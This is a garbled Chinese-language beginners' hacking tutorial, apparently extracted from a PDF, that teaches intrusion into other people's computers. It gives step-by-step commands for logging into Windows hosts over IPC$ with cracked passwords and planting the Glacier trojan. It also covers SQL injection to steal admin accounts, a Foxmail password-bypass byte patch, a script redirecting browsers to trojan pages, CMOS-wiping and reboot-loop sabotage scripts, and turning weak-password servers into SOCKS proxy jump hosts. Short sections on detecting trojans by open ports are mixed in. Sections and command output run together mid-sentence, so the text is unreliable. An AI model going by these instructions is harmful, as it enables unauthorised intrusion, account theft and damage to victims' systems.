文件socks5代理软件

socks5代理软件  时间:2021-03-28  阅读:()
1黑客基本技巧:听人说有经验的黑客仅仅通过一个ping命令就可以判定远程主机的操作系统.
这是怎么回事怎样实现:在ping主机后可以通过TTL返回值大体判定.
举例如下:TTL=107(WindowsNT)TTL=108(Windows2000)TTL=127或128(Windows9x)TTL=240或241(Linux)TTL=252(Solaris)新手入侵的几个问题TTL=240(Irix)大家可以在平时多总结一下,但也注意不要过于迷信,因为一个聪明的管理员会手动修改TTL值以迷惑入侵者.
:老是见到shell这个名词,这个shell是什么还有什么是exploit:shell代表的是用户和操作系统"交流"的接口,就像Windows2000中的cmd命令框.
shell的另一种解释是Unix系统下的一种脚本编程语言.
exploit一般解释为"溢出"或"漏洞".
我个人认2为解释成"溢出"更确切一些.
:用3389终端服务控制肉鸡好爽,可是对方的管理员如果在主控台的话,会不会看到我对他系统的控制:你的控制操作是在后台运行的,表面上是察觉不到的.
但是管理员可以通过"Alt+Ctrl+Del"组合键查看到你的控制进程,然后kill掉你的ID或者发个对话框过来吓你一跳,所以最好是确定管理员不在线的时候再进行控制.
:我已拿到一台Windows2000的admin权限,但是只能通过telnet登录控制.
我若想用终端控制它该怎样做:Windows2000自带一个无人职守的安装工具:sysocmgr.
exe.
你可以telnet进入主机后再在命令行下输入:C:\>echo[Components]>c:\hackartC:\>echoTSEnable=on>>c:\hackartC:\>sysocmgr/i:c:\winnt\inf\sysoc.
inf/u:c:\hackart/q/r过一会终端服务就会自动安装完毕.
"TSEnable=on"的意思是开启终端服务.
最后一行的/r参数是决定服务器是否重新启动.
若去掉/r参数将自动重启服务器.
重新启动后终端服务也会自动启动.
详细参数设定请参考MSDN帮助.
:我可以用Windows98入侵Windows2000或WindowsNT吗:当然可以!
也可以入侵Unix/Linux,前提是你要有跳板才行.
因为Windows98对网络的支持较差,没跳板的话入侵起来很费力.
:像我这样的菜鸟怎样才能逐步提高自己的入侵水平:多看看入侵教程,先从IIS系列入侵开始,逐步向入侵Solaris、Linux、FreeBsd、Irix等进化.
不要急,慢慢来.
:我想知道入侵的详细步骤,因为有许多时候我感到无从下手.
:入侵大体步骤如下:1.
扫描目标主机(找个好用的扫描器,推荐namp).
检查开放的端口,看哪个可以利用.
搜集目标服务器信息很重要,这可以保证"对症下药"地进行后面的入侵工作.
2.
看是否存在脆弱账号和密码,以及服务软件漏洞,如Wu-FTP漏洞等等.
3.
若目标主机固若金汤,而你又有钱的话,可以试试暴力破解.
4.
如果对方只开放80端口,你可以尝试探测一下IIS或CGI漏洞等.
5.
通过前面找到的漏洞进入对方主机,然后留后门,清除日志等等.
:像我这样的初学者用什么扫描工具最好:流光、X-scan、SuperScan等等.
:我对SUNOS入侵比较感兴趣,我想了解一下sunrpc远程溢出漏洞及相对应的版本.
:rpc.
ttdbserverd:Solaris2.
3,2.
4,2.
5,2.
5.
1,2.
6rpc.
cmsd:Solaris2.
5,2.
5.
1,2.
6,7sadmind:Solaris2.
6,7snmpXdmid:Solaris7,8本地漏洞:lpset:Solaris2.
6,7当你netstarttermservice失败后可尝试用此方法.
提示3黑客基本技巧作为一个初级黑客,我们首先要了解的是一般的入侵步骤.
一般入侵步骤分为三步:1.
扫描目标主机并分析扫描信息.
比如:探测开放的端口、获得服务软件及版本、探测漏洞等等.
2.
利用扫描找到的漏洞,探测并获取系统帐号或密码.
3.
通过系统帐号或密码获得权限,然后对入侵的主机进行操作.
下面从使用工具的角度讲解两个实际入侵的例子.
例子不涉及任何高深知识,但从中可以看出入侵的一般步骤.
一、入侵单机-普通攻击操作系统:WindowsNT系统.
工具:1.
shed.
exe:shed.
exe是一款用于网上查共享资源的工具.
它的查找速度快,可以查到很多服务端的共享文件.
不过其中有些ip在浏览器中无法访问,这是因为它们也包含了个人上网的ip.
2.
流光2000:一些网站和网吧的服务器目录都是共享的,但是需要访问用户名和密码,否则会出现访问不了或者权限不够的情况.
这时候我们可以用流光的ipc探测功能建立一个空对话,然后再简单探测用户列表.
如果遇到某些网管为了图方便把系统administrator账号设置得过于简单,便可以抓到肉鸡了.
3.
冰河8.
4:在被入侵服务器端带宽很大的情况下,使用冰河可以很快控制服务器,并且在几分钟内就可以查到对方主机的主页所在位置.
但是如何上传并且控制它呢这就要用到Windows自带的cmd.
exe工具了.
4.
cmd.
exe:点击Windows桌面右下角"开始"按钮,选择"运行",在命令框里输入"cmd"后,点击"确定"进入cmd.
exe的对话框.
在cmd.
exe对话框中使用net命令,具体操作如下:入侵的基本步骤介绍第一步:输入"netuse\\ip\ipc$password/user:username"说明:以一个超级用户名与你想入侵的主机建立联接,超级用户必须具有admin权限.
这里的"ip"输入要入侵主机的ip地址,"username"与"password"就是刚才用流光找到的超级用户的用户名与密码.
比如:"netuse\\210.
*.
*.
*\ipc$juntuan/user:juntuan".
第二步:输入"copyg-server.
exe\\ip\admin$\system32"说明:g-server.
exe就是冰河的远程服务器端,该命令将此文件拷贝到对方主机WindowNT系统里的system32目录里.
第三步:"输入nettime\\ip"说明:查看对方的服务器时间.
之所以要查看对方服务器时间,是因为不同机器上的系统时间有差异,这里必须以对方的服务器时间为准.
第四步:at\\iptimeg-server.
exe说明:这里的time就是对方的主机时间.
该命令的作用是在规定时间执行该程序.
比如at\\210.
*.
*.
*19:55g-server.
exe,这样冰河就可以在对方主机时间是19.
55的时候控制该电脑了.
二、入侵网站——SQL注入攻击工具:榕哥的SQL注入攻击工具包,在榕哥的站点可以下载.
这个工具包中有两个小程序:"wed.
exe"和"wis.
exe",其中"wis.
exe"是用来扫描某个站点中是否存在SQL注入漏洞的,而"wed.
exe"则是用来破解SQL注入用户名密码的.
两个工具的使用都非常简单,结合起来就可以完成从寻找注入点到注入攻击成功的整个过程.
1.
寻找SQL注入点"wis.
exe"使用的格式如下:"wis.
exe网址".
首先打开命令提示窗口,比如输入如下命令:"wis.
exehttp://www.
xxx.
com/".
在输入网址4时,前面的"http://"和最后面的"/"是必不可少的,否则将会提示无法进行扫描.
输入完毕后按回车键,即可开始进行扫描了.
从扫描结果中可以看到,某些网站中存在着很多SQL注入漏洞.
我们可以随便挑其中一个,然后对它进行SQL注入,破解出管理员的帐号.
2、SQL注入破解管理员帐号现在使用刚才下载的工具包中的"wed.
exe"程序,进入命令窗口中输入命令.
命令格式为:"wed.
exe网址".
需要注意的是,这次输入网址时,最后面千万不要加上那个"/",但前面的"http://"还是必不可少的.
输入后按回车键可以看到程序运行的情况.
可以看到程序自动打开了工具包中的几个文件"C:\wed\wed\TableName.
dic"、"C:\wed\wed\UserField.
dic"和"C:\wed\wed\PassField.
dic",这几个文件分别用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件.
当然我们也可以用其它的工具来生成字典文件,不过榕哥"黑客字典"已经足够强大,不需要再去找其他工具了.
在破解过程中还可以看到"SQLInjectionDetected.
"的字样,表示程序还会对需要注入破解的网站进行一次检测,看看是否存在SQL注入漏洞,成功后才开始猜测用户名.
耐心等待一会后,就能获得数据库表名,然后得到用户表名和字长,再检测到密码表名和字长,最后用"wed.
exe"程序进行用户名和密码的破解,很快就得到了用户名和密码了.
3.
搜索隐藏的管理登录页面拿到了管理员的帐号后,还需要找到管理员登录管理的入口才行.
一般在网页上不会出现管理员的入口链接,这时候还是可以使用"wis.
exe"程序.
因为这个程序除了可以扫描出网站中存在的所有SQL注入点外,还可以找到隐藏的管理员登录页面.
管理员登录页面只可能隐藏在整个网站的某个路径下.
因此输入"wis.
exehttp://www.
xxx.
com//a"(http://www.
xxx.
com/为你要入侵网站的网址),对整个网站进行扫描.
依然要注意扫描语句中网址的格式.
按回车键后程序开始对网站中的所有页面进行扫描,在扫描过程中找到的隐藏登录页面会在屏幕上以红色显示出来.
查找完毕后,所有页面会以列表形式显示在命令窗口中.
在浏览器中输入网址,出现了本来隐藏着的管理员登录页面.
输入用户名和密码,就进入到后台管理系统了.
一、cmd命令框下用IPC$登录肉鸡的简单操作用记事本建立一个名为login.
bat文件,代码如下:@netuse\\%1\ipc$%3/u:"%2"@echo保存文件后,在cmd命令框里输入如下命令:login.
batx.
x.
x.
xuser/password其中"x.
x.
x.
x"为肉鸡IP地址,"user"为肉小黑客的九大贴身秘技鸡admin用户名,而"password"为密码.
这样我们以后每次用IPC$登录肉鸡就不用输入一大串的命令了.
二、进入Foxmail账户有妙招在Foxmail中可以为账户加上访问密码,如果想进入别人的信箱却不知道密码该怎么办呢一个众所周知的办法是:打开Foxmail文件夹下以账5黑客基本技巧户名命名的任意一个文件夹,把里边一个名为account.
stg的文件复制到你想进入的账户目录里,直接覆盖该目录下原来的account.
stg文件.
运行Foxmail,就可以不需密码直接进入该信箱.
但是上面的方法并不隐蔽,因为对方下次使用信箱时就会发现你破解了他的信箱.
要想进入对方的信箱而不被对方发现,可以使用下面这个办法:用16进制文件编辑器UltraEdit打开Foxamil的主程序Foxmail.
exe文件,按组合键"Alt+F3"在查找框里输入以下的代码"E8617EE4FF7515",单击"确定"开始后查找,找到后把其中的"7515"改为"9090",然后保存就可以了.
再次运行Foxmail.
exe后,就可以随意进入设有密码的Foxmail邮箱了.
该技巧对5.
0.
500.
0版本的Foxmail也有效.
三、利用vbs脚本判断对方的IE版本做过网页木马的朋友都知道,针对不同版本的IE,网页木马的制作方法也不相同,比方说针对IE6.
0版的网页木马制作方法与其它各个版本的就不相同.
因此我们在编制网页木马时,往往需要页面具有自动判别对方IE版本的能力,以便根据对方IE版本的不同,跳转到不同的网页木马页面.
以下一段vbs脚本可以帮助我们实现这个功能.
打开记事本,输入如下内容:〈SCRIPTlanguage=vbscript〉ifInstr(window.
navigator.
appversion,"MSIE6.
0")>0thenalert("浏览器:InternetExplorer6.
0")window.
location.
href="http://IE6.
0网页木马页面"elsealert("浏览器:6.
0版本以下")window.
location.
href="http://IE6.
0以下版网页木马页面"endif〈/SCRIPT〉这样,使用IE6.
0的用户浏览了该页面后,会自动跳转到"http://IE6.
0网页木马页面",不是IE6.
0的用户浏览后会自动跳转到"http://IE6.
0以下版网页木马页面".
当然,具体页面网址可根据你设置的木马页面进行修改.
四、肉鸡ipc$打不开的解决办法有些朋友反映通过telnet登录到对方的机器后却不能打开ipc$,这该怎么办呢可以按如下步骤操作:1.
首先试试在cmd命令框里输入netshare命令,看ipc$服务能不能使用,如果不能使用,说明对方没有安装文件和打印机共享服务,此时只能放弃了.
2.
如果ipc$服务可以使用,则输入netshareipc$,看ipc$能不能打开.
如果打不开就先输入netstopserver,然后输入netstartserver,这样就可以知道ipc$能不能打开.
3.
如果netstopserver命令不能执行,则要先关闭其附属进程,再关闭server的主进程,之后ipc$多半可以连接上了.
4.
如果ipc$还是连接不上,那么很可能是对方开了防火墙,这时只能想办法杀掉防火墙的进程了.
五、用vbs脚本结束进程用记事本工具编写一个.
vbs文件,之后在Windows2000下运行,就可以成功结束正在运行的进程.
文件代码内容如下:OnErrorResumeNextstrComputer=".
"SetobjWMIService=GetObject("winmgmts:"_&&"{impersonationLevel=impersonate}!
\\"&&strComputer&&"\root\cimv2")SetcolProcessList=objWMIService.
ExecQuery_("Select*fromWin32_ProcessWhereName=*.
exe")ForEachobjProcessincolProcessListobjProcess.
Terminate()Next其中"*.
exe"是你想要结束的进程,将它改为你要结束进程的名即可.
6六、利用批处理清除对方的CMOS内容如果你想清除对方电脑的CMOS内容该怎么办方法有很多,其中利用批处理的方式是比较另类的一招.
具体办法是打开记事本,在文件中输入如下内容:ConstForAppending=8Dimfso,x,ySetfso=CreateObject("Scripting.
FileSystemObject")Setx=fso.
OpenTextFile("c:\autoexec.
bat",ForAppending,True)Sety=fso.
CreateTextFile("c:\1.
txt",True)x.
WriteBlankLines(1)x.
Write"debugnetstat-anActiveConnectionsActiveConnections是指当前本机活动连接,Proto是指连接使用的协议名称,LocalAddress是以必须设置"文件夹选项→查看"中属性为"显示所有文件和文件夹"才可以看到),然后右键单击该文件,在弹出菜单中选择"用记事本打开",接下来在config.
sys文件中加入一行:device=c:\null.
sys/d:null保存修改结果,退出记事本.
以后,你的电脑就会在出现Windows的启动画面时自动重新启动,如此反复下去,别人一定以为你的电脑出了问题,而你就可以偷偷乐了.
ProtoLocalAddressForeignAddressStateTCP0.
0.
0.
0:800.
0.
0.
0:0LISTENINGTCP0.
0.
0.
0:210.
0.
0.
0:0LISTENINGTCP0.
0.
0.
0:76260.
0.
0.
0:0LISTENINGUDP0.
0.
0.
0:4450.
0.
0.
0:0UDP0.
0.
0.
0:10460.
0.
0.
0:0UDP0.
0.
0.
0:10470.
0.
0.
0:08本地计算机的IP地址和连接正在使用的端口号,ForeignAddress是连接该端口的远程计算机的IP地址和端口号,State则是表明TCP连接的状态,你可以看到后面三行的监听端口是UDP协议的,所以没有State表示的状态.
从上面可以看到机器的7626端口已经开放,正在监听等待连接,这表示机器很可能已经感染了冰河.
二、工作在Windows2000下的FportFport是FoundStone出品的网络安全工具.
它可以用来列出系统中所有打开的TCP/IP和UDP端口,以及对应的应用程序的完整路径、PID标识、进程名称等信息.
该软件在cmd命令框下使用,请看例子:D:\>fport.
exeFPortv1.
33-TCP/IPProcesstoPortMapperCopyright2000byFoundstone,Inc.
http://www.
foundstone.
com;这样各个端口究竟是什么程序打开的就一目了然了.
如果发现有某个可疑程序打开了某个可疑端口,那就很可能是木马.
Fport的最新版本是2.
0.
很多网站都提供下载,但是为了安全起见,最好还是到FoundStone的官方网站去下载.
(http://www.
foundstone.
com/knowledge/zips/fport.
zip)三、与Fport功能类似的图形化界面工具ActivePortsActivePorts为SmartLine出品的用来监视电脑所有打开的TCP/IP/UDP端口的工具.
它不但可以将你所有的端口显示出来,还显示所有端口所对应的程序所在的路径,本地IP和远端IP(试图连接你的电脑IP)是否正在活动.
除此之外,它还提供了一个关闭端口的功能,当你用它发现被木马开放的端口时,可以立即将端口关闭.
这个软件在WindowsNT/2000/XP平台下工作,你可以从http://www.
smartline.
ru/software/aports.
zip下载.
其实使用WindowsXP的用户无须借助其它软件即可以得到端口与进程的对应关系,因为Win-dowsXP所带的netstat命令比以前的版本多了一个"o"参数,使用这个参数就可以检测到与打开端口对应的进程.
上面介绍了几种查看本机开放端口以及与端口相对应的进程的方法,通过这些方法可以轻松地发现基于TCP/UDP协议的木马.
但是如果碰上反弹端口木马,或者利用驱动程序及动态链接库技术制作的新木马时,以上这些方法就很难查出木马的痕迹了.
所以我们一定要养成良好的上网习惯,不要随意运行邮件中的,从网上下载的软件先用杀毒软件检查一遍再使用,在上网时要打开网络防火墙和病毒实时监控,以保护自己的机器不被木马或病毒入侵.
作为一个黑客,在攻击前收集对方机器信息是很重要的.
因此如何得到对方主机的IP地址是一个重要问题,下面就介绍几种简单的查看目标机IP地址的方法.
一、通过QQ软件查IP补丁查IP每当QQ的一种新版本出来,隔不了几天补丁程序就出来了,即便是菜鸟查看IP地址和端口都异常容易,如QQ2005珊瑚虫版就在腾讯公司提供轻松查看IP地址PidProcessPortProtoPath748tcpsvcs7TCPC:\WINNT\System32\tcpsvcs.
exe748tcpsvcs9TCPC:\WINNT\System32\tcpsvcs.
exe748tcpsvcs19TCPC:\WINNT\System32\tcpsvcs.
exe416svchost135TCPC:\WINNT\system32\svchost.
exe9黑客基本技巧图1图2图3QQ2005下载之后很短时间内就出来了,这种版本便是在QQ原有版本的基础上,增加了显示好友的IP地址以及地理位置的补丁,只要对方在线就可以轻松查看对方的IP地址、所在地等信息(图1).
二、用防火墙查看IP由于QQ使用的是UDP协议来传送信息的,而UDP是面向无连接的协议,为了保证信息到达对方,QQ需要对方发一个认证,告诉本机对方已经收到消息,一般的防火墙(例如天网)都带有UDP监听的功能,因此我们就可以利用这个功能来查看IP.
第一步:运行防火墙程序,在"自定义IP规则"那一栏把"UDP数据包监视"选项打上钩(QQ中的聊天功能使用的是UDP的4000端口作为数据发送和接收端口).
接着点一下工具按钮上那个像磁盘一样的"保存规则"图标(图2).
第二步:运行QQ,向想查询IP地址的QQ对象发一信息.
第三步:切换到防火墙程序所在窗口,点击主界面像铅笔一样的按钮进入日志界面,看看当前由防火墙记录下来的日志(图3).
在日志中,如果对方端口是OICQServer[8000],则表示该条日志上的IP地址是QQ服务器的.
排除了本机的IP地址、发送到网关的IP地址以及QQ服务器的IP地址后,剩下的就是对方的IP地址了,如图中为210.
82.
117.
92.
拥有了对方的IP地址,如果还想知道对方的地理位置,可以再配合"追捕"之类的工具软件,便可了解对方大概在哪里了.
用这种方法来查找IP地址,不会受QQ版本的限制,是一劳永逸的事.
注意:利用天网的日志功能也可以查到那些成天抱着一个扫描器到处扫描的人的IP地址.
这是黑客需要具备的很重要的技能,在攻击别人时,首先要懂得保护自己,时时警惕身边可能存在的黑客,以免弄得"出师未捷身先死",那就得不偿失了.
三、聊天室中查IP在允许贴图、放音乐的聊天室,利用HTML语10图4图5如果对方在浏览器中将图像、声音全部禁止了,此方法就无能为力.
对于使用代理服务器的,此方法也只能查到他所用代理的IP地址,无法查到其真实IP地址.
提示对于个人计算机或是其它机器我们还可以使用ping命令查看对方是否在线,只有对方在线,我们才能再进行下一步攻击.
提示言向对方发送图片和音乐,如果把图片或音乐文件的路径设定到自己的IP上来,那么尽管这个URL地址上的图片或音乐文件并不存在,但你只要向对方发送过去,对方的浏览器将自动来访问你的IP.
对于不同的聊天室可能会使用不同的格式,但你只需将路径设定到你的IP上就行了.
如:"XXX聊天室"发送格式如下:发图像:imgsrc="http://61.
128.
187.
67/love.
jpg"发音乐:imgbgsound="http://61.
128.
187.
67/love.
mid"这两个语句里的61.
128.
187.
67需要替换成你自己的IP地址.
这样你用监视软件就可以看到连接到你机器的IP地址,这种软件很多,如lockdown,IPHunter等.
四、查网站的IP地址如果想要攻击某个网站的话,也需要首先获得该网站的IP地址,获取网站地址最简单的办法还是使用Windows自带的一个小程序ping.
exe.
在cmd命令框下输入"pingwww.
xxx.
com".
运行之后会显示该网站的IP地址以及其他一些信息(图4).
如果ping通了,将会从该IP地址返回byte,time和TTL的值,这样我们就有了进一步进攻的条件.
其中time时间越短,表示响应时间越快.
随着QQ版本的升级,QQ安全性也越来越高,用户可以自己设定是通过点对点模式还是服务器模式传送消息,如果对方选择了服务器模式,你也就得不到他的IP地址了.
提示11黑客基本技巧随着网络黑客工具的简单化和傻瓜化,越来越多的黑客爱好者可以通过现成的攻击工具轻松地入侵主机.
然而谁也不想在管理员的眼皮底下入侵电脑,因此在入侵成功之后,一个很重要的事情是:你能不能确认你的行为是在别人的监视之下所以我们首先要知道管理员是不是现在正在你侵入的主机上.
一、要判定管理员是否在线,首先就要知道管理员是通过什么方式管理主机的:是pcanywhere、vnc、DameWar、终端服务、ipc、telnet还是本地登录.
如果是用第三方的控屏工具(pcanywhere、vnc、DameWar等),你只要看相应端口有没有状态为"ESTABLISHED"的连接.
在cmd命令框里输入"netstat-an"命令就可以知道.
如果想查看与端口相关的进程,使用"Fport.
exe"就可以了.
比如我们在一台主机上使用"netstat-an"发现如下的信息:ActiveConnections然后使用Fport.
exe得到如下的信息:如何判断管理员是否在线在Windows2000下打开cmd窗口,然后输入如下命令:for/l%ain(1,1,254)dostart/min/lowtelnet192.
168.
0.
%a3389这条命令可以使192.
168.
0.
x这个IP段所有开放3389端口的主机都会暴露出来.
这条命令执行后会在任务栏打开254个小窗口,每个窗口对应一个该IP段的IP地址.
如果检测到某IP地址的主机未开放3389端口,则对应的窗口将在5秒钟内退出,最后剩下的窗口对应的就是开放了端口的主机了,看一下小窗口的标题可以得知主机的IP地址.
如果你觉得你的机器性能很好的话,还可以把/low参数去掉.
如果要扫描一台主机的多个端口,可以输入如下命令:for/l%ain(1,1,65535)dostart/low/mintelnet192.
168.
0.
1%a这样就扫描到IP地址为192.
168.
0.
1的主机从1到65535的所有端口.
输入如下命令扫描一个网段的所有端口:for/l%ain(1,1,254)dofor/l%bin(1,1,65535)dostart/low/mintelnet192.
168.
0.
%a%b这样就可以扫描IP段为192.
168.
0.
x的全部主机从1到65535的所有端口.
以上命令在Windows2000以及WindowsXP下测试可以使用.
扫描一个网段的所有端口ProtoLocalAddressForeignAddressStateTCPlin:1755lin:telnetESTABLISHEDTCPlin:1756lin:netbios-ssnESTABLISHEDTCPlin:1758202.
103.
243.
105:httpTIME_WAITTCPlin:1764202.
103.
243.
105:httpTIME_WAITTCPlin:6129lin:1751ESTABLISHEDPidProcessPortProtoPath528mysqld-nt3306TCPD:\mysql\bin\mysqld-nt.
exe1328DWRCS6129TCPC:\WINNT\SYSTEM32\DWRCS.
EXE8System138UDP248lsass500UDPC:\WINNT\system32\lsass.
exe12其中"1328DWRCS→6129TCPC:\WINNT\SYSTEM32\DWRCS.
EXE"这行代表的是DameWareMiniRemoteControl服务.
从这个可以看出,管理员是通过DameWareMiniRemoteCon-trol来管理现在的主机,连接的端口是6129.
同样,如果管理员使用其他的控屏工具,比如pcanywhere、vnc等,我们也可以通过"netstat-an"查看端口连接的情况.
二、对于从本地或终端服务登录的,由此可以通过查看winlogon进程进行判断.
我们可以使用的工具是psttools系列工具中的pulist.
exe,它能够查看本机所有正在运行的进程.
当然仅凭几个winlogon进程也很难完全判定在线的是不是管理员,因为一般用户和管理员都是通过图形界面登录的,身份验证都是在GINA(GraphicalIdentificationandAuthentication,图形标识和身份验证)中进行,而GINA又和winlogon进程紧密相关,所以查看有几个winlogon进程只能知道当前有几个用户登录主机.
在主机上运行pulist.
exe,查看进程情况如下:上面我们发现有"208\\C:\WINNT\system32\winlogon.
exe"和"1084\\C:\WINNT\system32\winlogon.
exe"这二个winlogon.
exe进程,由此可以知道目前有两个用户通过本地或终端服务登录主机.
再结合上面说的判定方法,使用"netstat-an"命令查看TCP端口连接:由此可以看出管理员使用的是终端3389连接登录.
三、因为telnet的登录不是通过winlogon来管理的,所以要判断通过telnet登录的管理员是否在线还是看相应端口的连接吧.
我们知道一般情况下telnet使用23端口连接,通过"netstat-an"命令可以很清楚地看出23端口有没有打开:C:\>netstat-anActiveConnections我们也可以通过上面的方法查看相应的进程,比如使用FPORT.
EXE得到如下的信息:E:\HACK>fportFPortv2.
0-TCP/IPProcesstoPortMapperCopyright2000byFoundstone,Inc.
从上面信息中"1112tlntsvr23TCPC:\WINNT\system32\tlntsvr.
exe"这行可以知道23端口对应的正是telnet服务tlntsvr.
exe.
四、如果管理员是通过IPC$管道进行登录管理,我们可以用WindowsNT系统内置的工具NETSESSION来判断其是否在线.
NETSESSION的作用是列出或断开连接本地计算机和与它连接的客户之间的会话.
使用后结果如下:PIDPath0[IdleProcess]8[System]160\SystemRoot\System32\smss.
exe184\\C:\WINNT\system32\csrss.
exe208\\C:\WINNT\system32\winlogon.
exe680C:\WINNT\System32\svchost.
exe404C:\WINNT\Explorer.
EXE1088\\C:\WINNT\system32\csrss.
exe1084\\C:\WINNT\system32\winlogon.
exeNumLocalIPPortRemoteIPPORTStatus10192.
168.
0.
13389192.
168.
2.
11071EstablishedProtoLocalAddressForeignAddressStateTCP127.
0.
0.
1:23127.
0.
0.
1:1030ESTABLISHEDTCP127.
0.
0.
1:1030127.
0.
0.
1:23ESTABLISHEDPidProcessPortProtoPath660inetinfo21TCPC:\WINNT\System32\inetsrv\inetinfo.
exe1112tlntsvr23TCPC:\WINNT\system32\tlntsvr.
exe660inetinfo80TCPC:\WINNT\System32\inetsrv\inetinfo.
exe416svchost135TCPC:\WINNT\system32\svchost.
exe660inetinfo443TCPC:\WINNT\System32\inetsrv\inetinfo.
exe8System1028TCP408telnet1030TCPC:\WINNT\system32\telnet.
exe13黑客基本技巧E:\HACK>netsession命令成功完成.
从上面我们可以看出当前有一个用户名为LIYUN的用户登录了主机LIN.
下面再给大家推荐一个比较好的工具——PSTOOLS工具系列里面的psloggedon.
exe,它不仅能列出使用IPC$登录的用户,而且能列出本地登录的用户.
运行效果如下:E:\Pstools\Pstools>psloggedon.
exePsLoggedOnv1.
21-LogonSessionDisplayerCopyright(C)1999-2000MarkRussinovichUsersloggedonlocally:肉鸡是指打开了3389端口微软终端服务(microsoftterminalservice),又存在弱密码的高速服务器的俗称.
我们要用肉鸡做跳板,是出于安全考虑,因为这样可以更好地隐藏自己的踪迹.
我们可以用各种远程管理工具登录上肉鸡,然后像操作自己电脑上一样控制远程的服务器(也就是肉鸡)做我们想做的事情.
基本的工具:1.
X-scanv1.
3强大的漏洞扫描工具,对于初学者来说是非常好的一个工具.
我们主要用它来扫描一些基本的漏洞(主要是WindowsNT中的弱密码).
2.
Superscan非常快速的端口扫描工具,可以在很短的时间里发现某个IP域上IP的分布.
使用它的原因主要是为了避免盲目扫描,以便提高扫描效率.
比如说,某个IP域上IP地址的分布不是连续的,有可能从xxx.
xxx.
0.
0-xxx.
xxx.
50.
255每个IP地址上都有计算机存在,而从xxx.
xxx.
51.
0-xxx.
xxx.
100.
255每个IP都没有计算机存在.
如果你不通过Superscan扫描事先了解这个情况的话,就会白白花很长时间去扫描根本不存在的主机,浪费金钱和精力.
3.
fluxay大名鼎鼎的扫描工具,我们主要用它的NT管道命令功能来实现连接目标主机、添加用户以及启动远程服务等功能.
注意:最好使用4.
0版本fluxay.
4.
基于Windows2000或更高版本的cmd提示符工具也就是说,跳板的制作至少是要在Windows2000以上的操作系统下进行.
5.
sksockserver.
exe做跳板的主角,我们就是用它来实现远程主机的Socks5代理功能.
肉鸡DIY全攻略2004-*-*14:33:38LIN\Administrator-----这个是本地登录的用户administratorUsersloggedonviaresourceshares:2004-*-*14:41:04LIN\LINYUN-----这个是使用IPC$连接的用户LINYUN当然,如何判定管理员是否在线是一个比较深入的话题,上面说的仅仅是提供一个思路.
如果说管理员登录后却锁定了主机,或者正在运行屏幕保护程序,这就不太好判断了.
有矛必有盾,我们既然能通过各种方式判定管理员是不是在线,管理员也能通过这样的途径知道自己是否被入侵,从而尽快地查出入侵者.
所以请广大的黑客爱好者不要以身试法,入侵国内主机.
计算机用户名客户类型打开空闲时间\\LINLINYUNWindows20002195000:08:47146.
全球IP地址分配表这个工具对于高手来说是不必要的.
但是我们主要的目标是国外的主机,而很多以前没有做过跳板的初学者网友对国外主机IP的分布不是很了解,因此可以通过全球IP地址分配表来了解IP分布情况.
并以此作为我们选定所要扫描的IP域的主要根据,这样就节省了用"追捕"软件查找IP的实际所在地的时间了.
入侵思路:1.
先在自己的机器上打开全球IP地址分配表,选取一个IP区域.
2.
用Superscan扫描选定的IP区域,找到其中一个IP很集中的区域,然后放到x-scan进行漏洞扫描(因为是面对以前没有做过跳板的网友,所以这里只介绍用NT弱密码制作跳板),找到若干个有弱密码的IP.
3.
通过弱密码登录肉鸡,把sksockserver.
exe上传到目标主机上,然后远程启动sksockserver.
这样,跳板就做好了.
具体步骤:1.
首先,我们选择某段IP,比如:x.
85.
0.
0~x.
85.
50.
255,将扫描起始IP与结束IP放在Superscan搜索框里面去,再把Superscan的扫描端口设置为80,点击"确定"后开始扫描.
这时,在下面的列表框里面,会出现一大批的活跃IP.
比如x.
85.
0.
0~x.
85.
40.
255.
2.
随便选一段不太长的IP段,如x.
85.
0.
0~x.
85.
5.
255.
因为我们马上要用X-scan对它们进行扫描,而X-scan扫描速度并不是很快,如果IP段过长或IP地址过多的话,会降低扫描效率,并有可能使X-scan出现误报.
3.
选择好后IP段后就可以用X-scan扫描了.
在"设置"菜单里,先选"扫描模块",选择"开放端口"和"NT弱密码"两个选项,在"扫描参数"里,填上我们刚才选定的IP范围:x.
85.
0.
0~x.
85.
5.
255,接着将"端口相关设置"里的其他端口去掉,只留下80,3389两个端口,其他设置默认.
然后就开始搜索,这大概需要花8~9分钟的时间(因为X-scan虽然简单,但是速度慢),搜索完成后看看搜索结果,你会惊喜地发现许多机器存在弱密码,可以用来作肉鸡.
但是需要注意的是,X-scan会有一些误报,大家一定要有耐心去试啊.
4.
我们选择一个主机为弱密码的IP地址,比如:x.
x.
0.
14.
接下来就是用流光验证它到底接不接受远程连接,密码正不正确.
打开流光,选择"工具→NT管道远程命令",出现对话框,把刚才的IP、用户名和密码都填进去,然后按回车键.
在界面上"NTCMD"提示符后面输入"CMD",再次按回车键后屏幕上出现了"C:\WINNT\SYSTEM32"的提示符.
这表明刚才的用户名和密码是正确的,这台机器已经基本是你的了.
5.
进去之后就可以做跳板了.
要把sksockserver.
exe放到肉鸡上,这样才能启动远程服务,让这台肉鸡成为跳板.
打开肉鸡上的cmd命令框,在命令提示符下输入如下命令:C:\>netuse\\x.
x.
0.
14\ipc$password/user:username其中"username"和"password"分别是你探测出来的用户名和密码.
当系统提示"命令成功完成"后,就说明IPC$远程连接成功建立了.
然后输入以下命令:C:\>copycsksockserver.
exe\\x.
x.
0.
14\admin$成功后系统会提示:"成功复制一个文件".
这样我们就成功地把sksockserver.
exe传到了目标主机上.
6.
接下来的任务就是让它远程启动了.
再次打开流光,在"NTCMD"里键入"CMD",之后在提示符下输入如下命令:csksockserver–install(系统提示:snakesockproxyserviceinstalled)csksockserver–configport1949(端口可由自己决定,这里的1949是随便选15黑客基本技巧的,输入完按回车键后系统提示:theportvaluehavesetto1949)csksockserver–configstarttype2(系统提示:thestarttypehavesetto2---autocnetstartskserver)这个时候远程登录服务已经成功启动,这台机器已经成为你的跳板了.
当然,并不是找到肉鸡后就万事大吉了.
为了更好地利用找到的肉鸡,我们还有很多工作要做,比如清理我们的入侵痕迹、创建一个自己的admin权限用户名以及增加图形化远程登录功能等.
下面简单介绍一下这些后续工作.
做后续工作除了要使用到前面介绍的工具之外,还要用到其它三个工具:1.
Sockscap:强大的socks代理调度软件.
2.
sksockserverGUI:snake的代理跳板GUI(图形界面程序).
3.
mstsc:微软terminalservice(终端服务)的客户端程序.
用于登录3389肉鸡.
有了它,我们就可以象控制自己的机器一样控制终端服务器,做我们想做的事情了.
开了3389服务后,如果要把这台肉鸡当成自己的机器来使用,就肯定要有自己的登录名.
